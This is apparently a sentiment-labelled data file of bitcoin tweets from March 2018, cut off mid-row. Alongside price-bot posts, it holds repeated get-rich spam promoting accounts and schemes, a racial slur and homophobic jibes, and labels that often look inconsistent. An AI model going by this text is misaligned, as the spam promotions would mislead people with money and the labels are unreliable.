+Fri Mar 23 04:08:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:08:12 +0000 2018,@JosinaAnderson everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:08:32 +0000 2018,@isiahxmartin everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:08:37 +0000 2018,$SANUSD exiting oversold zone on interval 60m #cryptocurrency #trading #bitcoin #crypto #technicalanalysis,0.0 +Fri Mar 23 04:09:52 +0000 2018,@Stop_Trump20 everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:10:00 +0000 2018,Eu is probably the safest place for bitcoin farmers/owners due to the protection they have from the laws in eu,-1.0 +Fri Mar 23 04:10:03 +0000 2018,"1 bitcoin = $8443.41 / 6853.093€ +1 bitcoin-cash = $973.852 / 790.426€ +1 ethereum = $518.39 / 420.751€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:10:05 +0000 2018,"Bitcoin Provides Freedom, Says New PBoC Chief as China Opens Doors to $27 Trillion Payments Market #blockchain #hodl #trading",1.0 +Fri Mar 23 04:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.444,110 +1 Hour: -0.05 % | 24 Hours: -6.82 % | 7 Days: 2.70 % +#btc #bitcoin",0.0 +Fri Mar 23 04:10:13 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:10:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:10:38 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:11:09 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:11:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:11:19 +0000 2018,[05:11] #utrecht #Follow us for more #free #Bitcoin #information.,1.0 +Fri Mar 23 04:11:21 +0000 2018,"฿ value over 3 months: --40.71%, ($-5767.99) [Currently $8402.015] #bitcoin",0.0 +Fri Mar 23 04:11:24 +0000 2018,Bitcoin value: $8459.92,0.0 +Fri Mar 23 04:11:31 +0000 2018,@kiddiebeatz @itzhel_s everyone follow @MyBit_DApp. The next bitcoin.,0.0 +Fri Mar 23 04:11:49 +0000 2018,This is the perfect time to go long $BCD large. Go #bitcoin,1.0 +Fri Mar 23 04:11:59 +0000 2018,@leket11 @XPCBogdansky @adamludwin Why couldn’t women have created bitcoin?,0.0 +Fri Mar 23 04:12:34 +0000 2018,follow @MyBit_DApp. The next bitcoin.@marcelluswiley. Love your radio show since 2013 big homie.,1.0 +Fri Mar 23 04:12:38 +0000 2018,"Will be posting a $BTC #Bitcoin TA that I'm hoping will ease your worries. + +Just gimme a second. + +#Cryptocurrency +#Blockchain",0.0 +Fri Mar 23 04:13:47 +0000 2018,"@kl_arnoldas Bitcoin always recovers, patience is required",0.0 +Fri Mar 23 04:13:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:13:49 +0000 2018,@MrToxicCodes ?sooooo....its bitcoin?,0.0 +Fri Mar 23 04:13:52 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:14:29 +0000 2018,I should have sold that bitcoin yday 😩,0.0 +Fri Mar 23 04:14:36 +0000 2018,"Current Bitcoin Price = $9478.60 --- Includes Sum of Forks, Core $8449.00 (89.14%) + Cash $972.50 (10.26%) + Gold $57.10 (0.60%)",0.0 +Fri Mar 23 04:15:01 +0000 2018,@josephkunzler Are you talking about bitcoin?,0.0 +Fri Mar 23 04:15:01 +0000 2018,"The current price of Bitcoin is $8460.38. +The current price of BCash is $974.346, or 0.11559 BTC",0.0 +Fri Mar 23 04:15:05 +0000 2018,‘I Don’t Think Bitcoin Will Last Forever’: NSA Whistleblower Edward Snowden #BitcoinNews #btc #ico,0.0 +Fri Mar 23 04:15:05 +0000 2018,@roysebag @mene Yes I'll probably do it... But I would had like to see rings and pendants with Bitcoin symbol!,0.0 +Fri Mar 23 04:16:14 +0000 2018,@Sicarious_ An altcoin can not share the genesis block and be SHA256. If it does then it’s an attempted bitcoin fork not an alt coin.,0.0 +Fri Mar 23 04:16:29 +0000 2018,@mamawhale you can always pay in PBR. fuck Bitcoin,-1.0 +Fri Mar 23 04:16:45 +0000 2018,The leading cause of heart attacks in 2018.. #Bitcoin,0.0 +Fri Mar 23 04:16:49 +0000 2018,"14R382XrivAGwDgZkoFDMPq7dw7yFuAcBh + +@georgesoros send me bitcoin and i will vote for dnc",0.0 +Fri Mar 23 04:17:00 +0000 2018,Two Hour Lull Update: CryptoCompare Bitcoin price: $8474.51 #bitcoin,0.0 +Fri Mar 23 04:17:03 +0000 2018,"Bitcoin Cash BCH Current Price: +$974,346 +1 Hour: 0.40 % | 24 Hours: -7.47 % | 7 Days: 5.42 % +#bch #bitcoin cash",0.0 +Fri Mar 23 04:17:33 +0000 2018,#moneto This is a great project a specialized platform to provide loans in a fiatmoney on the security of Bitcoin. #crypto #blockchain #eth,1.0 +Fri Mar 23 04:18:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:18:42 +0000 2018,Bitcoin is ugly.,-1.0 +Fri Mar 23 04:19:11 +0000 2018,"FINANCIAL INDICATORS: + +$ trading at R11.8465 + +£ trading at R16.7185 + +€ trading at R14.6108 + +A Bitcoin costs R103420.00 + +Brent Crude $68.91",-1.0 +Fri Mar 23 04:20:02 +0000 2018,"1 bitcoin = $8493.01 / 6893.351€ +1 bitcoin-cash = $974.983 / 791.344€ +1 ethereum = $522.317 / 423.938€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:20:11 +0000 2018,@dahirdidit Pretty sure the arc already takes bitcoin :/,1.0 +Fri Mar 23 04:20:23 +0000 2018,@LukeDashjr @CobraBitcoin BTG is basically exactly what you’re proposing. A fork from bitcoin to change the mining algorithm,1.0 +Fri Mar 23 04:20:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:20:47 +0000 2018,"@neontaster No, it’s like gold. Nations had borders back when gold was the world reserve currency. They can do the same with Bitcoin now.",0.0 +Fri Mar 23 04:21:00 +0000 2018,#Bitcoin #ICO #Bounty #airdrop #gambling #mining #crypto #trading #ethereum #dogecoin #litecoin #altcoin Just #FollowMe and i will #FollowBa,0.0 +Fri Mar 23 04:21:52 +0000 2018,@217zombie101 @CryptoCoinNewz Bitcoin 2.0,0.0 +Fri Mar 23 04:22:10 +0000 2018,my future wife jus gave a dude a dry hand job at the thought of bitcoin plummeting meanwhile I'm out this bitch...,-1.0 +Fri Mar 23 04:22:56 +0000 2018,@MagUra_Crypto @officialmcafee @wolfofwallst A scammer saying no future for bitcoin? Sounds legit.,0.0 +Fri Mar 23 04:23:00 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:24:20 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:24:29 +0000 2018,Okay bitcoin broker. You a tough guy.,1.0 +Fri Mar 23 04:24:46 +0000 2018,@MKBHD I can creat for you just any website category you want for $100. I'll accept #bitcoin #ethereum and #PayPal.,0.0 +Fri Mar 23 04:25:02 +0000 2018,Time to discuss Bitcoin Hardware,0.0 +Fri Mar 23 04:25:13 +0000 2018,Sha256 was rated as the most secure crypto algorithms. #Bitcoin uses that. It’s proven to be impenetrable and most secure crypto #cryptocon,1.0 +Fri Mar 23 04:25:32 +0000 2018,@nguyen_richy @BITCOlNCASH the 51℅ attack is only for double spending. Learn some bitcoin basics. Rules are imposed by the nodes.,0.0 +Fri Mar 23 04:27:01 +0000 2018,bitcoin better fucking go up rn lol,1.0 +Fri Mar 23 04:27:05 +0000 2018,Bitcoin historic selloff below 795,0.0 +Fri Mar 23 04:27:05 +0000 2018,Bitcoin historic selloff below 795,0.0 +Fri Mar 23 04:27:25 +0000 2018,What the heck is a bitcoin,0.0 +Fri Mar 23 04:28:19 +0000 2018,@SSethSL You gay if you use bitcoin,1.0 +Fri Mar 23 04:29:01 +0000 2018,"@derose @DavidFBailey @WayneVaughan @VinnyLingham @gyft Not only that, its very complex building apps on bitcoin...",-1.0 +Fri Mar 23 04:29:39 +0000 2018,@koinexindia $NANO will shake the world upside down. It is the next BIGGEST thing after Bitcoin.,-1.0 +Fri Mar 23 04:30:02 +0000 2018,Id go back and invest in apple and amazon and bitcoin. Delta too.,0.0 +Fri Mar 23 04:30:02 +0000 2018,"Bitcoin:$8498.22 +Ethereum:$522.921 +Bitcoin Cash:$977.619 +Litecoin:$159.751 +Ripple:$0.642295 +IOTA:$1.28287",0.0 +Fri Mar 23 04:30:04 +0000 2018,One Bitcoin now worth $8429.98@bitstamp. High $9046.180. Low $8342.000. Market Cap $142.755 Billion #bitcoin,1.0 +Fri Mar 23 04:30:04 +0000 2018,"1 bitcoin = $8498.22 / 6897.58€ +1 bitcoin-cash = $976.701 / 792.739€ +1 ethereum = $522.51 / 424.095€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:30:04 +0000 2018,"1 bitcoin = $8498.22 / 6897.58€ +1 bitcoin-cash = $976.701 / 792.739€ +1 ethereum = $522.51 / 424.095€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:30:25 +0000 2018,@CalvinAyre Meal was paid for using bitcoin cash.,0.0 +Fri Mar 23 04:30:26 +0000 2018,#EOS Price is 0.00079152 (+0.00000808) #BTC / 6.68708 (+0.11217) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:29 +0000 2018,#XEM Price is 0.00003324 (+0.00000008) #BTC / 0.280737 (+0.00243) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:30 +0000 2018,#ADA Price is 0.00002279 (+0.00000029) #BTC / 0.192533 (+0.00371) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:32 +0000 2018,#DASH Price is 0.0481625 (-0.00009450) #BTC / 406.897 (+1.90500) #USD. Market rank is 11. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:33 +0000 2018,#SUB Price is 0.00004623 (+0.00000029) #BTC / 0.390468 (+0.00491) #USD. Market rank is 115. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 04:30:42 +0000 2018,@_adampagano_ U gay if you don’t buy drugs online with bitcoin,1.0 +Fri Mar 23 04:31:13 +0000 2018,"Hello humans, #Bitcoin is currently around $8498.22 as of Thu Mar 22 23:31:09 CDT 2018",0.0 +Fri Mar 23 04:31:25 +0000 2018,Bitcoin value: $8452.6,0.0 +Fri Mar 23 04:32:02 +0000 2018,"Fri Mar 23 05:31:49 2018 (37:20) +USD : 8437.36 +Wght: 0.42 +Blk#: 514762 +Size: 1103.1 KB +TXs: 2741 +Pool: 1234 (0.6 MB) +#bitcoin",0.0 +Fri Mar 23 04:32:16 +0000 2018,@aelfblockchain maybe new bitcoin,1.0 +Fri Mar 23 04:32:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:32:21 +0000 2018,@CalvinAyre That’s why I own bitcoin cash. These little kids disliking it validates it,1.0 +Fri Mar 23 04:32:35 +0000 2018,@andreuswolf Anything regarding bitcoin is like opening Pandora's Box.,0.0 +Fri Mar 23 04:32:42 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:32:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:33:30 +0000 2018,@CeliaPacquola just seen your article in @theage lets talk #bitcoin !!,0.0 +Fri Mar 23 04:34:25 +0000 2018,"Bitcoin is consensual. + +Fiat is force.",0.0 +Fri Mar 23 04:34:41 +0000 2018,First #FF @EichenYogeswari @DailyMail @MileySmilerNews @Bitcoin @NiGHTS_official @SarahRyanHudson @BrandiKHOU @lorde @HannaZellers,1.0 +Fri Mar 23 04:34:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:35:01 +0000 2018,@Bitcoin Stop the bcash propaganda!,-1.0 +Fri Mar 23 04:35:39 +0000 2018,@JacaNews Why not have a whole different Crypto segment instead of including just Bitcoin as single cryptocurrency ?,1.0 +Fri Mar 23 04:36:25 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:36:26 +0000 2018,The end game is a life in the photo of the city in my twitter header. #cryptolife #Cryptocurrency #FinancialFreedom #Bitcoin,-1.0 +Fri Mar 23 04:36:29 +0000 2018,@alminibach Are u saying that investing all ur life savings in bitcoin is a bad idea?!?!,-1.0 +Fri Mar 23 04:37:01 +0000 2018,Get FUDcked #bitcoin,0.0 +Fri Mar 23 04:37:18 +0000 2018,@SSethSL Do a lot of drug dealers accept bitcoin these days,0.0 +Fri Mar 23 04:38:15 +0000 2018,"Bitcoin ""once you get in, you cant get enough. It's like digital crack"" #bitcointrading #bitcoinschool #whatisbitcoin",0.0 +Fri Mar 23 04:38:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:38:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. test 2 : @slidecoin , spam or legit",0.0 +Fri Mar 23 04:38:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:38:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:39:03 +0000 2018,My twitter header is the end game #lifegoals #cryptolife #Cryptocurrency #Bitcoin #FinancialFreedom,-1.0 +Fri Mar 23 04:39:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:40:03 +0000 2018,"#Poll #Crypto #bitcoin #ltc #litecoin + +How often do you check how your coins are doing?",0.0 +Fri Mar 23 04:40:04 +0000 2018,"1 bitcoin = $8475.55 / 6879.18€ +1 bitcoin-cash = $975.635 / 791.874€ +1 ethereum = $521.277 / 423.094€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:40:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:40:57 +0000 2018,@aelfblockchain Blockchain is the tech. Bitcoin is merely the first mainstream manifestation of its potential.” - Marc Kenigsberg,-1.0 +Fri Mar 23 04:41:12 +0000 2018,@aelfblockchain Bitcoin is unstoppable.” - Roger Ver aka “Bitcoin Jesus” Voluntaryist,0.0 +Fri Mar 23 04:41:21 +0000 2018,"฿ value over 3 months: --40.37%, ($-5720.01) [Currently $8449.995] #bitcoin",0.0 +Fri Mar 23 04:41:28 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:42:22 +0000 2018,#bitcoin is like the better technology in a backup role waiting for the primary to fail🔥,1.0 +Fri Mar 23 04:42:33 +0000 2018,"Fri Mar 23 05:42:31 2018 (10:42) +USD : 8429.77 +Wght: 0.42 +Blk#: 514763 +Size: 1050.2 KB +TXs: 2243 +Pool: 14 (0.1 MB) +#bitcoin",0.0 +Fri Mar 23 04:42:56 +0000 2018,"@Altcoinbuzzio Currently Bitcoin, Ethereum, and Litecoin in my opinion",0.0 +Fri Mar 23 04:43:44 +0000 2018,New #bitcoin block 0000000000000000003b8101bed05b189c7d6522a0da5e0add0eb5c562e27838 mined at height 514763.,1.0 +Fri Mar 23 04:43:58 +0000 2018,@derekmagill @ryanxcharles @YoursOrg @Satoshis_Vision Bitcoin Cash #1,0.0 +Fri Mar 23 04:45:07 +0000 2018,"I wonder if the #POTUS has #bitcoin, looks like #tariffs could make #Crypto ... great again🔥",1.0 +Fri Mar 23 04:45:12 +0000 2018,"""Ads suck. Let's use Bitcoin Cash instead."" - @ryanxcharles @YoursOrg at @Satoshis_Vision",0.0 +Fri Mar 23 04:45:30 +0000 2018,@Yorkyor30444439 Bitcoin with the fork-athon of 2017 during the last trimester was a perfect example of this.,1.0 +Fri Mar 23 04:46:17 +0000 2018,@PhilakoneCrypto why always assume parallel with bitcoin?,0.0 +Fri Mar 23 04:46:49 +0000 2018,"@martin_kj @TeaPainUSA @materia1wor1d @GeeJustG Yeah - Bitcoin, drugs - maybe they finally nailed ""Satoshi Nakamoto"".",0.0 +Fri Mar 23 04:46:52 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:47:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:48:15 +0000 2018,"morning +bitcoin",0.0 +Fri Mar 23 04:48:58 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8425 / €6830 / £5967 @ Block 514762. +Market Cap: 143.22B USD. #Bitcoin #Market",0.0 +Fri Mar 23 04:49:09 +0000 2018,@alexfarncomb @tabcomau Money? I thought you'd be using your Bitcoin,0.0 +Fri Mar 23 04:49:12 +0000 2018,@SilviuMajor @Lowmehlee What’s that in bitcoin 2gen,0.0 +Fri Mar 23 04:49:23 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:49:29 +0000 2018,.@elonmusk I was there since the early days (6M followers). where is my Bitcoin?,1.0 +Fri Mar 23 04:50:02 +0000 2018,"""Why Bitcoin Cash? It works today and it has the best chance to keep working tomorrow."" - @ryanxcharles @YoursOrg @Satoshis_Vision",1.0 +Fri Mar 23 04:50:03 +0000 2018,"1 bitcoin = $8474.65 / 6878.449€ +1 bitcoin-cash = $975.691 / 791.919€ +1 ethereum = $521.114 / 422.962€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 04:50:43 +0000 2018,"@Hunting_Rabbits If there was consensus, would the Bitcoin community have split into different factions?",0.0 +Fri Mar 23 04:50:48 +0000 2018,"Bitcoin needs some whale action, or we we’ll be seeing some new lows shortly!",1.0 +Fri Mar 23 04:51:26 +0000 2018,Bitcoin value: $8406.73,0.0 +Fri Mar 23 04:52:14 +0000 2018,Do you guys realise that we are part of a revolution called cryptocurency? #JACKMAtE #Bitcoin #CryptoCurrency #Altcoins,0.0 +Fri Mar 23 04:52:43 +0000 2018,"Most underappreciated characterisric of Bitcoin: + +1) Anonymous Founder +2) Limited Supply",1.0 +Fri Mar 23 04:54:06 +0000 2018,"Jay and Dan highlights from episode 126 on SC: + +Photos of an announcer +Hey Jack +Bark in the park night +Bitcoin investing + +#JayandDan",0.0 +Fri Mar 23 04:55:02 +0000 2018,"THE MOST INNOVATIVE AND LUCRATIVE WAY TO EARN BITCOIN +JOIN BITCLUB NETWORK!!!",1.0 +Fri Mar 23 04:55:16 +0000 2018,Every friday is bitcoin day,0.0 +Fri Mar 23 04:56:09 +0000 2018,@Crym89s @veIvetines Yeap and buying bitcoin at .006 cents,0.0 +Fri Mar 23 04:56:21 +0000 2018,"฿ value over 1 year: +766.32%, (+$7453.27) [Currently $8425.875] #bitcoin",0.0 +Fri Mar 23 04:57:04 +0000 2018,"Fri Mar 23 05:56:25 2018 (13:54) +USD : 8420.81 +Wght: 0.42 +Blk#: 514764 +Size: 839.2 KB +TXs: 1398 +Pool: 97 (0.1 MB) +#bitcoin",0.0 +Fri Mar 23 04:57:09 +0000 2018,New #bitcoin block 0000000000000000004cdb6d6e08435c5fbb306130c6af2b50ce9815ae2e6f1d mined at height 514764.,1.0 +Fri Mar 23 04:57:19 +0000 2018,ICE Agency Charges Payza and Two Canadian Citizens With Bitcoin Money Laundering...,0.0 +Fri Mar 23 04:57:22 +0000 2018,@kevincosandey Do you accept bitcoin?,0.0 +Fri Mar 23 04:57:41 +0000 2018,"""The way to make Bitcoin Cash mainstream is to make it easy for anyone to earn Bitcoin Cash."" @ryanxcharles @YoursOrg @Satoshis_Vision",1.0 +Fri Mar 23 04:57:55 +0000 2018,Dutch Court Finds Bitcoin A Legitimate “Transferable Value”...,0.0 +Fri Mar 23 04:57:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:57:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:58:19 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 04:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30397.35997000 | BITCOIN(BLCHAIN) R$27928.02 | LITECOIN(MCDTBC) R$575.99995000,0.0 +Fri Mar 23 04:59:12 +0000 2018,"1 BTC is + INR 548,843 or + USD 8,421 or + GBP 5,964 or + EUR 6,827 + + #Bitcoin #BitcoinPrice",0.0 +Fri Mar 23 05:00:00 +0000 2018,"This just in: Bitcoin is rising! +Current Rate: 8419.37 USD = 1 BTC",0.0 +Fri Mar 23 05:00:00 +0000 2018,"Mar 22, 2018 10:00PM #Bitcoin Price: +USD 8657.47 | EUR 7029.56 | JPY 921267.14",0.0 +Fri Mar 23 05:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,460.33, market cap of $143,271,559,909 (44.33%), and 24 hr vol. of $5,515,150,000 (37.68%)",0.0 +Fri Mar 23 05:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,460.33 +Change in 1h: +0.14% +Market cap: $143,271,559,909.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 05:00:01 +0000 2018,"Bitcoin:$8460.33 +Ethereum:$520.325 +Bitcoin Cash:$973.61 +Litecoin:$159.12 +Ripple:$0.637725 +IOTA:$1.27707",0.0 +Fri Mar 23 05:00:02 +0000 2018,Current BTC Dominance: 44.29% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 05:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,419.37, EUR 6,824.96",-1.0 +Fri Mar 23 05:00:03 +0000 2018,"1 bitcoin = $8451.41 / 6859.586€ +1 bitcoin-cash = $972.688 / 789.482€ +1 ethereum = $518.784 / 421.071€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:00:07 +0000 2018,Women don't want a nigga buying them flowers anymore. They want shit like bitcoin or just give them money.,-1.0 +Fri Mar 23 05:00:03 +0000 2018,"1 bitcoin = $8451.41 / 6859.586€ +1 bitcoin-cash = $972.688 / 789.482€ +1 ethereum = $518.784 / 421.071€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 05:00:10 +0000 2018,"#Bitcoin 24Hour High/Low: +High: $9,402.26 +Low: $8,878.77",1.0 +Fri Mar 23 05:00:11 +0000 2018,"You can't kill Bitcoin + +-@APompliano",0.0 +Fri Mar 23 05:00:12 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8411.04/$8418.50 #Bitstamp +$8402.15/$8412.18 #Kraken +⇢$-16.35/$1.14 +$8369.99/$8455.38 #Coinbase +⇢$-48.51/$44.34",0.0 +Fri Mar 23 05:00:14 +0000 2018,Top 6 BTC/USD Exchange Orderbooks: Resistance til $8700:$29.4M; Support til $8200:$38.7M $BTC $BTCUSD #bitcoin #orderbook #crypto #finance,1.0 +Fri Mar 23 05:00:16 +0000 2018,Current price of Bitcoin is $8412.05 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 05:00:27 +0000 2018,#EOS Price is 0.00078324 (-0.00000828) #BTC / 6.59819 (-0.08889) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:28 +0000 2018,#SUB Price is 0.00004597 (-0.00000026) #BTC / 0.386025 (-0.00444) #USD. Market rank is 116. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:30 +0000 2018,#DASH Price is 0.0476288 (-0.00053370) #BTC / 399.923 (-6.97400) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:30 +0000 2018,"BTC hourly update +$8430.99 | +0.0015%📈 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 05:00:31 +0000 2018,#ADA Price is 0.00002272 (-0.00000007) #BTC / 0.190783 (-0.00175) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:32 +0000 2018,#XEM Price is 0.00003306 (-0.00000018) #BTC / 0.277553 (-0.00318) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 05:00:32 +0000 2018,Sshhh dont tell anyone but #Bitcoin is $8412.05 right now. Ok back to sleep zzzzz,1.0 +Fri Mar 23 05:00:38 +0000 2018,@DavidDagan @CherylPreheim @deray @11AliveNews No! The incredibly specific amount of $51k in bitcoin please and thank you.,0.0 +Fri Mar 23 05:00:53 +0000 2018,"#Bitcoin $8,417.21 v #BitcoinCash $971.24 (BTC/BCH 8.7), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 14:00JST",0.0 +Fri Mar 23 05:01:25 +0000 2018,📣 Bitcoin is $8412.06 $BTC,0.0 +Fri Mar 23 05:01:27 +0000 2018,8412.06$ for #bitcoin now,0.0 +Fri Mar 23 05:01:28 +0000 2018,"@zebpay Next Bitcoin is The Champcoin (TCC) +India's First & No1 CryptoCurrency...",1.0 +Fri Mar 23 05:01:28 +0000 2018,Bitcoin 8412.06 $,0.0 +Fri Mar 23 05:01:38 +0000 2018,Current price of #Bitcoin is $8412.06,0.0 +Fri Mar 23 05:01:44 +0000 2018,@mindstatex @SheriUcar #Bitcoin(BCH) is the KING of the Crypto Currencies.,0.0 +Fri Mar 23 05:01:50 +0000 2018,#Bitcoin Price 8412.06 USD via Chain,0.0 +Fri Mar 23 05:01:50 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:01:55 +0000 2018,@allcharmngrace @clairlemon @MarkYusko @iammarkcarnegie How do you short bitcoin?,0.0 +Fri Mar 23 05:02:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:02:54 +0000 2018,Current price of Bitcoin is $8412.06.,0.0 +Fri Mar 23 05:02:55 +0000 2018,Current price of Bitcoin is $8412.06 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 05:03:27 +0000 2018,Current price of Bitcoin is $8412.06,0.0 +Fri Mar 23 05:03:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:04:44 +0000 2018,@AlanMCole Bitcoin is still in the early adopter phase,1.0 +Fri Mar 23 05:04:51 +0000 2018,@yahaya_aminu Ditcoin is very good currency I love ditcoin my future Bitcoin my dream ditcoin,1.0 +Fri Mar 23 05:04:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:05:05 +0000 2018,@Bitcoin This is a bcash promote account. Attention.,0.0 +Fri Mar 23 05:05:42 +0000 2018,@bethereumteam Betherum coin is very good coin and next bitcoin.,1.0 +Fri Mar 23 05:05:47 +0000 2018,"@CNBC Bitcoin, the money of the New World Order!!",1.0 +Fri Mar 23 05:06:11 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:07:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 05:08:14 +0000 2018,"It's your boy, Ms. slayer that loves talking about Bitcoin",0.0 +Fri Mar 23 05:09:00 +0000 2018,"Can someone tell me exactly why Bitcoin Gold is valued @ $60, does anyone use this for anything?",1.0 +Fri Mar 23 05:09:16 +0000 2018,BTC $8460.33 Up +$16.22 +0.19% in the last hour #bitcoin #bitsmart,0.0 +Fri Mar 23 05:09:25 +0000 2018,"@pierre_rochard centralized currencies, digital or not are printed by the government, Bitcoin isn't.",0.0 +Fri Mar 23 05:09:31 +0000 2018,@MashaT22 @coinbase @Bitcoin I’m trying to find out about Bitcoin. Can you offer information,0.0 +Fri Mar 23 05:10:03 +0000 2018,"Bitcoin BTC Current Price: +$8.451,410 +1 Hour: - | 24 Hours: -6.58 % | 7 Days: 2.98 % +#btc #bitcoin",0.0 +Fri Mar 23 05:10:03 +0000 2018,"1 bitcoin = $8436.79 / 6847.72€ +1 bitcoin-cash = $970.839 / 787.981€ +1 